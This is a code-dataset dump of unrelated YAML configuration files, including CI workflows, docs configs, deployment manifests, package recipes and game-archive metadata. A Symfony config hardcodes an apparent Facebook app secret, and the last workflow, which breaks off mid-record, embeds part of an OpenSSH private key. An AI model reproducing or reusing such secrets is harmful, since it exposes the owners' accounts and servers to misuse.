code
stringlengths 38
801k
| repo_path
stringlengths 6
263
|
|---|---|
name: Build & Test
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
test:
name: test
runs-on: ${{ matrix.os }}
strategy:
fail-fast: false
matrix:
os: [ubuntu-latest, macos-latest, windows-latest]
rust:
- 1.36.0
- stable
- beta
- nightly
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: ${{ matrix.rust }}
override: true
- name: Build
run: cargo build --verbose
- name: Run tests
run: cargo test --verbose
- name: Build docs
run: cargo doc
fmt:
name: rustfmt
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: stable
override: true
- run: rustup component add rustfmt
- uses: actions-rs/cargo@v1
with:
command: fmt
args: --all -- --check
clippy:
name: clippy
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: true
- uses: actions-rs/toolchain@v1
with:
profile: minimal
toolchain: stable
override: true
- run: rustup component add clippy
- uses: actions-rs/cargo@v1
with:
command: clippy
args: --all --lib --tests -- --deny warnings
# These jobs doesn't actually test anything, but they're only used to tell
# bors the build completed, as there is no practical way to detect when a
# workflow is successful listening to webhooks only.
#
# ALL THE PREVIOUS JOBS NEEDS TO BE ADDED TO THE `needs` SECTION OF THIS JOB!
end-success:
name: bors build finished
if: success()
runs-on: ubuntu-latest
needs:
- test
- fmt
- clippy
steps:
- name: Mark the job as successful
run: exit 0
end-failure:
name: bors build finished
if: "!success()"
runs-on: ubuntu-latest
needs:
- test
- fmt
- clippy
steps:
- name: Mark the job as a failure
run: exit 1
|
.github/workflows/default.yml
|
site_url: https://inventree.readthedocs.io
site_name: InvenTree Documentation
site_description: InvenTree - Open Source Inventory Management
site_author: InvenTree
# Repository
repo_url: https://github.com/inventree/inventree-docs
repo_name: inventree/inventree-docs
# Theme
theme:
name: material
custom_dir: _includes/overrides
palette:
scheme: default
logo: assets/logo.png
favicon: assets/favicon.ico
icon:
repo: fontawesome/brands/github
features:
- navigation.tabs
- toc.autohide
edit_uri: "" # Disable "Edit" button
extra_css:
- stylesheets/extra.css
- stylesheets/brands.css
- stylesheets/regular.css
- stylesheets/solid.css
extra_javascript:
- javascripts/extra.js
- javascripts/fontawesome.js
- javascripts/brands.js
- javascripts/regular.js
- javascripts/solid.js
# Navigation
nav:
- InvenTree:
- About InvenTree: index.md
- Features: features.md
- What's New: releases/new.md
- FAQ: faq.md
- Contribute: contribute.md
- Credits: credits.md
- Installation:
- Introduction: start/intro.md
- Configuration: start/config.md
- Docker Setup: start/docker.md
- Bare Metal Setup: start/install.md
- Updating: start/update.md
- Migrating: start/migrate.md
- Demo Dataset: start/demo.md
- Parts:
- Parts: part/part.md
- Part Views: part/views.md
- Tracking: part/trackable.md
- Parameters: part/parameter.md
- Templates: part/template.md
- Tests: part/test.md
- Pricing: part/pricing.md
- Stock:
- Stock Items: stock/stock.md
- Adjusting Stock: stock/adjust.md
- Stocktake: stock/stocktake.md
- Stock Expiry: stock/expiry.md
- Stock Ownership: stock/owner.md
- Test Results: stock/test.md
- Build:
- Build Orders: build/build.md
- Bill of Materials: build/bom.md
- Allocating Stock: build/allocate.md
- Companies:
- Suppliers: companies/supplier.md
- Manufacturers: companies/manufacturer.md
- Customers: companies/customer.md
- Purchase Orders: companies/po.md
- Sales Orders: companies/so.md
- Report:
- Templates: report/report.md
- Labels: report/labels.md
- Reports:
- Test Reports: report/test.md
- Packing List: report/pack.md
- Build Order: report/build.md
- Order: report/order.md
- Barcodes: report/barcodes.md
- Admin:
- Admin Interface: admin/admin.md
- User Permissions: admin/permissions.md
- Export Data: admin/export.md
- Import Data: admin/import.md
- Python Shell: admin/shell.md
- Error Logs: admin/logs.md
- Email: admin/email.md
- Background Tasks: admin/tasks.md
- Extend:
- API: extend/api.md
- Python Interface: extend/python.md
- Plugins: extend/plugins.md
- Themes: extend/themes.md
- Third-Party: extend/integrate.md
- App:
- InvenTree App: app/app.md
- Barcodes: app/barcode.md
- Parts: app/part.md
- Stock: app/stock.md
- Settings: app/settings.md
- Privacy: app/privacy.md
- Translation: app/translation.md
- Suggestions: app/issues.md
# Plugins
plugins:
- search
- macros:
include_dir: _includes
# Extensions
markdown_extensions:
- admonition
- attr_list
- meta
- pymdownx.details
- pymdownx.highlight
- pymdownx.superfences
# - pymdownx.emoji:
# emoji_index: !!python/name:materialx.emoji.twemoji
# emoji_generator: !!python/name:materialx.emoji.to_svg
- toc:
permalink: true
# Global Variables
extra:
static_folder_source: ./InvenTree/InvenTree/static/
static_folder_local_default: ./inventree_static/
# Site Analytics
# See https://squidfunk.github.io/mkdocs-material/setup/setting-up-site-analytics/
analytics:
provider: google
property: UA-143467500-1
use_directory_urls: true
strict: true
|
mkdocs.yml
|
---
name: apiserver
instance_groups:
- azs:
- z1
instances: 3
jobs:
- name: webhooks
release: service-fabrik
- name: service-fabrik-apiserver
release: service-fabrik
properties:
admin-username: admin
admin-password: <PASSWORD>
backend_port: 8443 # Bosh links hack
ip: 10.244.14.252
port: 8443
etcd:
url:
- 10.244.14.252:2379
- 10.244.14.253:2379
- 10.244.14.254:2379
ssl:
ca: ((tls_etcd.ca))
crt: ((tls_etcd.certificate))
key: ((tls_etcd.private_key))
tls:
apiserver:
ca: ((tls_etcd.ca))
certificate: ((tls_apiserver.certificate))
private_key: ((tls_apiserver.private_key))
- name: etcd
properties:
tls:
etcd:
ca: ((tls_etcd.ca))
certificate: ((tls_etcd.certificate))
private_key: ((tls_etcd.private_key))
etcdctl:
ca: ((tls_etcdctl.ca))
certificate: ((tls_etcdctl.certificate))
private_key: ((tls_etcdctl.private_key))
peer:
ca: ((tls_etcd_peer.ca))
certificate: ((tls_etcd_peer.certificate))
private_key: ((tls_etcd_peer.private_key))
provides:
etcd:
as: etcd
release: cfcr-etcd
- name: bpm
release: bpm
name: etcd
networks:
- name: default
static_ips:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
persistent_disk_type: 10GB
stemcell: default
vm_type: small
releases:
- name: bpm
sha1: 5a03b988c725c6b5a1aed247c8c23c2bff9d421b
url: https://bosh.io/d/github.com/cloudfoundry-incubator/bpm-release?v=0.4.0
version: latest
- name: service-fabrik
version: latest
- name: cfcr-etcd
version: latest
stemcells:
- alias: default
os: ubuntu-trusty
version: latest
update:
canaries: 1
canary_watch_time: 1000-60000
max_in_flight: 1
serial: true
update_watch_time: 1000-60000
variables:
- name: etcd_ca
type: certificate
options:
is_ca: true
common_name: ca
- name: tls_etcd
type: certificate
options:
ca: etcd_ca
common_name: etcd.default.etcd.bosh
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- server_auth
- client_auth
- name: tls_etcd_peer
type: certificate
options:
ca: etcd_ca
common_name: etcd.default.etcd.bosh
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- server_auth
- client_auth
- name: tls_etcdctl
type: certificate
options:
ca: etcd_ca
common_name: etcd_acceptance_client
extended_key_usage:
- client_auth
- name: tls_apiserver
type: certificate
options:
ca: etcd_ca
common_name: apiserver_acceptance_client
alternative_names:
- 10.244.14.252
- 10.244.14.253
- 10.244.14.254
extended_key_usage:
- client_auth
- server_auth
|
templates/apiserver.yml
|
api_name: []
items:
- children:
- azure.identity.credentials.ClientSecretCredential.get_token
class: azure.identity.credentials.ClientSecretCredential
fullName: azure.identity.credentials.ClientSecretCredential
inheritance:
- inheritance:
- type: builtins.object
type: azure.identity._base.ClientSecretCredentialBase
langs:
- python
module: azure.identity.credentials
name: ClientSecretCredential
summary: Authenticates as a service principal using a client ID and client secret.
syntax:
content: ClientSecretCredential(client_id, secret, tenant_id, config=None, **kwargs)
parameters:
- description: the service principal's client ID
id: client_id
type:
- str
- description: one of the service principal's client secrets
id: secret
type:
- str
- description: ID of the service principal's tenant. Also called its 'directory'
ID.
id: tenant_id
type:
- str
- description: optional configuration for the underlying HTTP pipeline
id: config
type:
- <xref:azure.core.configuration>
type: class
uid: azure.identity.credentials.ClientSecretCredential
- class: azure.identity.credentials.ClientSecretCredential
exceptions:
- type: azure.core.exceptions.ClientAuthenticationError
fullName: azure.identity.credentials.ClientSecretCredential.get_token
langs:
- python
module: azure.identity.credentials
name: get_token(*scopes)
summary: Request an access token for *scopes*.
syntax:
content: get_token(*scopes)
parameters:
- description: desired scopes for the token
id: scopes
type:
- str
return:
type:
- <xref:azure.core.credentials.AccessToken>
type: method
uid: azure.identity.credentials.ClientSecretCredential.get_token
references:
- fullName: azure.identity.credentials.ClientSecretCredential.get_token
isExternal: false
name: get_token(*scopes)
parent: azure.identity.credentials.ClientSecretCredential
uid: azure.identity.credentials.ClientSecretCredential.get_token
|
preview/docs-ref-autogen/azure-identity/azure.identity.credentials.ClientSecretCredential.yml
|
{% set version = '1.1-2' %}
{% set posix = 'm2-' if win else '' %}
{% set native = 'm2w64-' if win else '' %}
package:
name: r-rsqlite
version: {{ version|replace("-", "_") }}
source:
fn: RSQLite_{{ version }}.tar.gz
url:
- https://cran.r-project.org/src/contrib/RSQLite_{{ version }}.tar.gz
- https://cran.r-project.org/src/contrib/Archive/RSQLite/RSQLite_{{ version }}.tar.gz
sha256: e4022e6a134bb0ff00d33474d2189a7bb48ee12b513d258e957b78bb1bf4e955
# patches:
# List any patch files here
# - fix.patch
build:
# If this is a new build for the same version, increment the build number.
number: 0
# This is required to make R link correctly on Linux.
rpaths:
- lib/R/lib/
- lib/
# Suggests: DBItest, knitr, rmarkdown, testthat
requirements:
build:
- r-base
- r-bh
- r-dbi >=0.4_9
- r-rcpp >=0.12.7
- r-memoise
- r-plogr
- posix # [win]
- {{native}}toolchain # [win]
- gcc # [not win]
run:
- r-base
- r-bh
- r-dbi >=0.4_9
- r-rcpp >=0.12.7
- r-memoise
- r-plogr
- {{native}}gcc-libs # [win]
- libgcc # [not win]
test:
commands:
# You can put additional test commands to be run here.
- $R -e "library('RSQLite')" # [not win]
- "\"%R%\" -e \"library('RSQLite')\"" # [win]
# You can also put a file called run_test.py, run_test.sh, or run_test.bat
# in the recipe that will be run at test time.
# requires:
# Put any additional test requirements here.
about:
home: https://github.com/rstats-db/RSQLite
license: LGPL (>= 2)
summary: Embeds the 'SQLite' database engine in R and provides an interface compliant with
the 'DBI' package. The source for the 'SQLite' engine (version 3.8.8.2) is included.
license_family: LGPL
# The original CRAN metadata for this package was:
# Package: RSQLite
# Version: 1.1-2
# Date: 2017-01-07
# Title: 'SQLite' Interface for R
# Authors@R: c( person("Kirill", "Muller", role = c("aut", "cre"), email = "<EMAIL>"), person("Hadley", "Wickham", role = c("aut")), person(c("David", "A."), "James", role = "aut"), person("Seth", "Falcon", role = "aut"), person(family = "SQLite Authors", role = "ctb", comment = "for the included SQLite sources"), person("Liam", "Healy", role = "ctb", comment = "for the included SQLite sources"), person(family = "R Consortium", role = "cph"), person(family = "RStudio", role = "cph") )
# Description: Embeds the 'SQLite' database engine in R and provides an interface compliant with the 'DBI' package. The source for the 'SQLite' engine (version 3.8.8.2) is included.
# Depends: R (>= 3.1.0)
# Suggests: DBItest, knitr, rmarkdown, testthat
# Imports: DBI (>= 0.4-9), memoise, methods, Rcpp (>= 0.12.7)
# LinkingTo: Rcpp, BH, plogr
# Encoding: UTF-8
# License: LGPL (>= 2)
# URL: https://github.com/rstats-db/RSQLite
# BugReports: https://github.com/rstats-db/RSQLite/issues
# Collate: 'RcppExports.R' 'SQLiteConnection.R' 'SQLiteDriver.R' 'SQLiteResult.R' 'connect.R' 'copy.R' 'datasetsDb.R' 'deprecated.R' 'dummy.R' 'extensions.R' 'query.R' 'rownames.R' 'table.R' 'transactions.R' 'utils.R' 'zzz.R'
# VignetteBuilder: knitr
# RoxygenNote: 5.0.1.9000
# NeedsCompilation: yes
# Packaged: 2017-01-08 00:12:25 UTC; muelleki
# Author: <NAME> [aut, cre], <NAME> [aut], <NAME> [aut], <NAME> [aut], SQLite Authors [ctb] (for the included SQLite sources), <NAME> [ctb] (for the included SQLite sources), R Consortium [cph], RStudio [cph]
# Maintainer: <NAME> <<EMAIL>>
# Repository: CRAN
# Date/Publication: 2017-01-08 16:57:09
# See
# http://docs.continuum.io/conda/build.html for
# more information about meta.yaml
|
r-packages/r-rsqlite/meta.yaml
|
uid: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2*"
fullName: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2"
name: "withVirtualNetworkGateway2"
nameWithType: "VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2"
members:
- uid: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner)"
fullName: "com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
name: "withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
nameWithType: "VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
summary: "Set the virtualNetworkGateway2 property: The reference to virtual network gateway resource."
parameters:
- description: "the virtualNetworkGateway2 value to set."
name: "virtualNetworkGateway2"
type: "<xref href=\"com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner?alt=com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayInner&text=VirtualNetworkGatewayInner\" data-throw-if-not-resolved=\"False\" />"
syntax: "public VirtualNetworkGatewayConnectionInner withVirtualNetworkGateway2(VirtualNetworkGatewayInner virtualNetworkGateway2)"
returns:
description: "the VirtualNetworkGatewayConnectionInner object itself."
type: "<xref href=\"com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner?alt=com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner&text=VirtualNetworkGatewayConnectionInner\" data-throw-if-not-resolved=\"False\" />"
type: "method"
metadata: {}
package: "com.azure.resourcemanager.network.fluent.models"
artifact: com.azure.resourcemanager:azure-resourcemanager-network:2.2.0
|
docs-ref-autogen/com.azure.resourcemanager.network.fluent.models.VirtualNetworkGatewayConnectionInner.withVirtualNetworkGateway2.yml
|
items:
- uid: com.microsoft.rest.retry._retry_handler
id: _retry_handler
parent: com.microsoft.rest.retry
children:
- com.microsoft.rest.retry._retry_handler.intercept(Chain)
- com.microsoft.rest.retry._retry_handler.RetryHandler()
- com.microsoft.rest.retry._retry_handler.RetryHandler(RetryStrategy)
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler
fullName: com.microsoft.rest.retry.RetryHandler
type: Class
source:
remote: &o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
branch: master
repo: https://github.com/Azure/azure-sdk-for-java.git
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 18
package: com.microsoft.rest.retry
summary: <p>An instance of this interceptor placed in the request pipeline handles retriable errors. </p>
syntax: &o1
content: public class RetryHandler
inheritance:
- java.lang.Object
- Interceptor
- uid: com.microsoft.rest.retry._retry_handler.intercept(Chain)
id: intercept(Chain)
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: intercept(Chain chain)
fullName: Response com.microsoft.rest.retry.RetryHandler.intercept(Chain chain)
type: Method
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 64
package: com.microsoft.rest.retry
syntax:
content: public Response intercept(Chain chain)
parameters:
- id: chain
type: 01552053
return:
type: e9d34ed6
- uid: com.microsoft.rest.retry._retry_handler.RetryHandler()
id: RetryHandler()
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler()
fullName: com.microsoft.rest.retry.RetryHandler.RetryHandler()
type: Constructor
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 46
package: com.microsoft.rest.retry
summary: <p>Initialized an instance of <xref href="com.microsoft.rest.retry._retry_handler" data-throw-if-not-resolved="false"></xref> class. Sets default retry strategy base on Exponential Backoff. </p>
syntax:
content: public RetryHandler()
- uid: com.microsoft.rest.retry._retry_handler.RetryHandler(RetryStrategy)
id: RetryHandler(RetryStrategy)
parent: com.microsoft.rest.retry._retry_handler
href: com.microsoft.rest.retry._retry_handler.yml
langs:
- java
name: RetryHandler(RetryStrategy retryStrategy)
fullName: com.microsoft.rest.retry.RetryHandler.RetryHandler(RetryStrategy retryStrategy)
type: Constructor
source:
remote: *o0
path: runtimes/client-runtime/src/main/java/com/microsoft/rest/retry/RetryHandler.java
startLine: 59
package: com.microsoft.rest.retry
summary: >-
<p>Initialized an instance of <xref href="com.microsoft.rest.retry._retry_handler" data-throw-if-not-resolved="false"></xref> class.</p>
<p></p>
syntax:
content: public RetryHandler(RetryStrategy retryStrategy)
parameters:
- id: retryStrategy
type: com.microsoft.rest.retry._retry_strategy
description: <p>retry strategy to use. </p>
references:
- uid: 01552053
spec.java:
- name: Chain
fullName: Chain
- uid: e9d34ed6
spec.java:
- name: Response
fullName: Response
- uid: com.microsoft.rest.retry._retry_strategy
parent: com.microsoft.rest.retry
href: com.microsoft.rest.retry._retry_strategy.yml
name: RetryStrategy
fullName: com.microsoft.rest.retry.RetryStrategy
type: Class
summary: <p>Represents a retry strategy that determines the number of retry attempts and the interval between retries. </p>
syntax:
content: public class RetryStrategy
- uid: com.microsoft.rest.retry._retry_handler
parent: com.microsoft.rest.retry
href: com.microsoft.rest.retry._retry_handler.yml
name: RetryHandler
fullName: com.microsoft.rest.retry.RetryHandler
type: Class
summary: <p>An instance of this interceptor placed in the request pipeline handles retriable errors. </p>
syntax: *o1
|
JavaDoc/api/com.microsoft.rest.retry._retry_handler.yml
|
--- !<MAP>
contentType: "MAP"
firstIndex: "2019-01-21 19:24"
game: "Unreal Tournament"
name: "CTF-BT-(bar)ForPawelAndZanmato"
author: "BarCode"
description: "None"
releaseDate: "2014-03"
attachments:
- type: "IMAGE"
name: "CTF-BT-(bar)ForPawelAndZanmato_shot_1.png"
url: "https://f002.backblazeb2.com/file/unreal-archive-images/Unreal%20Tournament/Maps/BunnyTrack/B/CTF-BT-(bar)ForPawelAndZanmato_shot_1.png"
originalFilename: "CTF-BT-(bar)ForPawelAndZanmato.zip"
hash: "6344a65b08e8530bb8aaef4c779a984872aec057"
fileSize: 19870442
files:
- name: "CTF-BT-(bar)ForPawelAndZanmato.unr"
fileSize: 8664835
hash: "831bb1501931106d92b7fb169893ea38e1ae3f3f"
- name: "i4Games_BTScripts_200607.u"
fileSize: 335186
hash: "7b3d32af89fcf7a20898aa75e7fd5402a3c88373"
- name: "BarCodeTexture2010.utx"
fileSize: 11506410
hash: "231e49be69cc2040b18f0de141a77def187ad241"
- name: "Pawel-And-Zanmato-BTMusic.umx"
fileSize: 11707467
hash: "2c2726bc4a39ebef367b3a1aaf27334fa79f6cd2"
otherFiles: 0
dependencies:
CTF-BT-(bar)ForPawelAndZanmato.unr:
- status: "OK"
name: "i4Games_BTScripts_200607"
- status: "OK"
name: "BarCodeTexture2010"
- status: "OK"
name: "Pawel-And-Zanmato-BTMusic"
downloads:
- url: "http://www.i4games.euhttp://www.i4games.eu/maps/CTF-BT-%28bar%29ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
- url: "https://f002.backblazeb2.com/file/unreal-archive-files/Unreal%20Tournament/Maps/BunnyTrack/B/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: true
repack: false
state: "OK"
- url: "https://files.vohzd.com/unrealarchive/Unreal%20Tournament/Maps/BunnyTrack/B/6/3/44a65b/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
- url: "https://unreal-archive-files.eu-central-1.linodeobjects.com/Unreal%20Tournament/Maps/BunnyTrack/B/6/3/44a65b/CTF-BT-(bar)ForPawelAndZanmato.zip"
main: false
repack: false
state: "OK"
deleted: false
gametype: "BunnyTrack"
title: "CTF-BT-(bar)ForPawelAndZanmato Solo Version"
playerCount: "6-12 Gamers"
themes:
Nali Temple: 0.1
Tech: 0.4
Ancient: 0.1
Skaarj Tech: 0.3
Indistrial: 0.1
bots: false
|
content/Unreal Tournament/Maps/BunnyTrack/B/6/3/44a65b/ctf-bt-barforpawelandzanmato_[6344a65b].yml
|
file_paths:
input_calibrant_file: ../../../SXRD_raw_data/desy_2021/diffraction_images/LaB6/LaB6_5mm_Dilatometer-00003.tif
# Input file path for the calibrant diffraction pattern image
output_calibration_path: ../../../SXRD_analysis/desy_2021/calibration-pyFAI/DESY_2021_LaB6_1554mm_Dilatometer_pyFAI.poni
# Output file path for the .poni calibration file
input_path: ../../../SXRD_raw_data/desy_2021/diffraction_images/
# Input file path for the diffraction pattern images
input_experiment_list:
- Def_01
- Def_03
- Def_04
- Def_05
- Def_06
- Def_07
- Def_08
- Def_09
- Def_10
- Heat_02
# Input experiment list (name of input folders)
glob_search_term: T*.tif
# Glob search term (common name of the image files)
output_path: ../../../SXRD_analysis/desy_2021/
# Output path for azimuthally integrated or caked data files
output_experiment_list:
- experiment01-deformation
- experiment03-deformation
- experiment04-deformation
- experiment05-deformation
- experiment06-deformation
- experiment07-deformation
- experiment08-deformation
- experiment09-deformation
- experiment10-deformation
- experiment02-heating
# Output experiment list (name of output folders)
setup_inputs:
beam_centre_x: 1034.850
# x-coordinate of the beam-centre in pixels
beam_centre_y: 1027.741
# y-coordinate of the beam-centre in pixels
# Note, this is 2048 - 1020.259 since value from Dioptas is from top rather than bottom
sample_detector_distance: 1554.0496
# Sample-to-detector distance in millimetres (unit used by Fit2d)
wl: 1.240000e-11
# Beam wavelength in metres
pixel_x: 0.000200
# Pixel size in metres (in x)
pixel_y: 0.000200
# Pixel size in metres (in y)
calibrant_type: LaB6
# Calibrant type, eg. CeO2, LaB6, etc.
num_calibration_rings: 14
# Number of calibrant rings used for calibration
refinement_inputs:
number_of_points: 5000
# Number of points used to resolve the intensity profile
number_of_cakes: 72
# Number of cakes for 'caking' the synchrotron diffraction pattern images
pixel_size: 0.200
# Pixel size in millimetres
|
notebooks/yaml/config_desy_2021.yaml
|
---
- name: Check if zpool is configured for iocage
shell: /sbin/zfs get mountpoint {{ iocage_zpool }}/iocage
ignore_errors: true
register: zpool_activated
tags:
- iocage-comb
- jenkins
- iocage-cell
- name: Mark zpool for iocage usage
shell: iocage activate {{ iocage_zpool }}
when:
- zpool_activated | failed
register: zpool_activated
tags:
- iocage-comb
- name: Register iocage mountpoint
shell: /sbin/zfs get -H mountpoint {{ iocage_zpool }}/iocage | awk '{print $3}'
register: iocage_mountpoint
when:
- zpool_activated | success
tags:
- iocage-comb
- jenkins
- iocage-cell
- name: Check if we can skip downloading the release
stat: path='{{iocage_mountpoint }}{{ iocage_releases_dir }}/{{ iocage_release_version }}'
register: release_dir
tags:
- iocage-comb
- pkg-server
- name: bsdinstall Prepare target area
file: path=/usr/freebsd-dist state=directory
when:
- ansible_connection == "chroot"
tags:
- iocage-comb
- name: bsdinstall Copy files
copy: src=/usr/freebsd-dist/{{ item.name }} dest=/usr/freebsd-dist/{{ item.name }}
with_items:
- { name: "src.txz" }
- { name: "base.txz" }
when:
- ansible_connection == "chroot"
tags:
- iocage-comb
- name: Fetch {{ host_os }} release {{ iocage_release_version }}
shell: echo "{{ iocage_release_version }}" | /usr/local/sbin/iocage fetch ftpfiles="{{ iocage_ftp_files}}" ftphost="{{ iocage_ftp_host }}" ftpdir="{{ iocage_ftp_dir }}"
when:
- release_dir.stat.isdir is undefined
- ansible_connection != "chroot"
tags:
- iocage-comb
- pkg-server
- name: bsdinstall Fetch {{ host_os }} release {{ iocage_release_version }}
shell: echo "{{ iocage_release_version }}" | /usr/local/sbin/iocage fetch ftpfiles="{{ iocage_ftp_files }}" ftplocaldir=/usr/freebsd-dist
when:
- release_dir.stat.isdir is undefined
- ansible_connection == "chroot"
tags:
- iocage-comb
- pkg-server
- name: Check if it is now present
stat: path='{{ iocage_mountpoint }}{{ iocage_releases_dir }}/{{ iocage_release_version }}'
when: release_dir.stat.isdir is undefined
tags:
- iocage-comb
register: release_dir
- name: Create pkglist file
copy: src=pkglist.txt dest='/iocage/jails/pkglist.txt'
# copy: src=pkglist.txt dest='{{ iocage_mountpoint }}{{ iocage_jails_dir }}/pkglist.txt'
tags:
- iocage-comb
- name: Enable iocage service
tags:
- iocage-comb
service:
name: iocage
enabled: true
|
roles/comb/tasks/iocage.yml
|
imports:
- { resource: parameters.ini }
- { resource: security.yml }
framework:
#esi: ~
#translator: { fallback: en }
secret: %secret%
charset: UTF-8
router: { resource: "%kernel.root_dir%/config/routing.yml" }
form: true
csrf_protection: true
validation: { enable_annotations: true }
templating: { engines: ['twig'] } #assets_version: SomeVersionScheme
session:
default_locale: %locale%
auto_start: true
# Twig Configuration
twig:
debug: %kernel.debug%
strict_variables: %kernel.debug%
# Assetic Configuration
assetic:
debug: %kernel.debug%
use_controller: false
filters:
cssrewrite: ~
# closure:
# jar: %kernel.root_dir%/java/compiler.jar
# yui_css:
# jar: %kernel.root_dir%/java/yuicompressor-2.4.2.jar
# Doctrine Configuration
doctrine:
dbal:
driver: %database_driver%
host: %database_host%
port: %database_port%
dbname: %database_name%
user: %database_user%
password: %<PASSWORD>%
charset: UTF8
orm:
auto_generate_proxy_classes: %kernel.debug%
auto_mapping: true
# Swiftmailer Configuration
swiftmailer:
transport: %mailer_transport%
host: %mailer_host%
username: %mailer_user%
password: <PASSWORD>%
jms_security_extra:
secure_controllers: true
secure_all_services: false
fos_facebook:
file: %kernel.root_dir%/../vendor/facebook/src/base_facebook.php
alias: facebook
app_id: 199637306764957
secret: 92eac9cab1c2512ec056306b3f72a947
cookie: true
permissions: [email, user_birthday, user_location]
fos_user:
db_driver: mongodb # other valid values are 'mongodb', 'couchdb'
firewall_name: public
user_class: Acme\DemoBundle\Document\User
doctrine_mongodb:
connections:
default:
server: mongodb://localhost:27017
options:
connect: true
default_database: test_database
document_managers:
default:
# auto_mapping: true
mappings:
AcmeDemoBundle: { type: annotation, dir: Document/ }
services:
my.facebook.user:
class: Acme\DemoBundle\Security\User\Provider\FacebookProvider
arguments:
facebook: "@fos_facebook.api"
userManager: "@fos_user.user_manager"
validator: "@validator"
container: "@service_container"
|
app/config/config.yml
|
version: "2.1"
services:
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:6.6.1
container_name: elasticsearch
hostname: elasticsearch
environment:
- cluster.name=docker-cluster
- bootstrap.memory_lock=true
- "ES_JAVA_OPTS=-Xms512m -Xmx512m"
ulimits:
memlock:
soft: -1
hard: -1
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:9200"]
interval: 30s
timeout: 15s
retries: 15
volumes:
- esdata1:/usr/share/elasticsearch/data
ports:
- 9200:9200
- 9300:9300
networks:
- backend-network
kibana:
image: docker.elastic.co/kibana/kibana:6.6.1
container_name: kibana
hostname: kibana
networks:
- backend-network
ports:
- 5601:5601
environment:
ELASTICSEARCH_HOSTS: http://elasticsearch:9200
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:5601"]
interval: 5s
timeout: 15s
retries: 15
links:
- elasticsearch
depends_on:
elasticsearch:
condition: service_healthy
logstash:
image: docker.elastic.co/logstash/logstash:6.6.1
container_name: logstash
hostname: logstash
networks:
- backend-network
command: -f /usr/share/logstash/pipeline/logstash.conf
healthcheck:
test: ["CMD", "curl", "-X", "GET", "http://localhost:9600"]
interval: 60s
timeout: 15s
retries: 15
ports:
- 5000:5000
- 9600:9600
volumes:
- ./elk-pipeline/:/usr/share/logstash/pipeline/
links:
- elasticsearch
depends_on:
elasticsearch :
condition: service_healthy
logspout:
image: bekt/logspout-logstash
container_name: logspout
hostname: logspout
networks:
- backend-network
restart: on-failure
environment:
ROUTE_URIS: logstash://logstash:5000
volumes:
- /var/run/docker.sock:/var/run/docker.sock
links:
- logstash
depends_on:
logstash:
condition: service_healthy
volumes:
esdata1:
driver: local
networks:
backend-network:
driver: bridge
|
docker-compose/docker-compose-log.yml
|
name: edjos build automation
on: push
jobs:
build:
name: Digital-Ocean
runs-on: ubuntu-latest
steps:
- name: Digital Ocean Auth
uses: digitalocean/action-doctl@v2.1.0
with:
token: ${{ secrets.DIGITALOCEAN_ACCESS_TOKEN }}
- name: login
run: |
cat <<EOF > .id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
<KEY>
za2X3+ztsVUlD56fphUM8xOc5q1exNPB01VfMcB9AAAFoBb9+F8W/fhfAAAAB3NzaC1yc2
EAAAGBAPQZos89b5UAjUsrDjz6G7Ti1XSp0ztr8ojwiteMcroA95bTy9Zsk4+Jc2qbjm95
o6CaqUBvtM1NhqCKgSAIZB3115F00pUvUlrcOuZ56a8oj4tWElkUfOLcfOTsLaGvXObrhI
CRv3typYpmdmHBraSDWSZUKS2kYZuuX5kvgWCw8aW9pDKx8QMG+LCpVmNKpyCaw9qnHbjD
fc1w9V2ETVFQEDOkXu25IYqOmL8/vJ5aRTQiCf/1crTlDBPl14OtoFk4GT0Mv0hQMZTfPG
AaRaQ+5P0huBZJULpokJsNcG0+xYsem8pOkGZiOApJPijtD9fxQPJ/99iPyD0W8OyGVuSg
AFP+3iQcvAPV8bb/LzgIn0HFAifxnvwtMjptNLRQCtf+WV+aEc6S2iG2kSLkpR2N9FPMyO
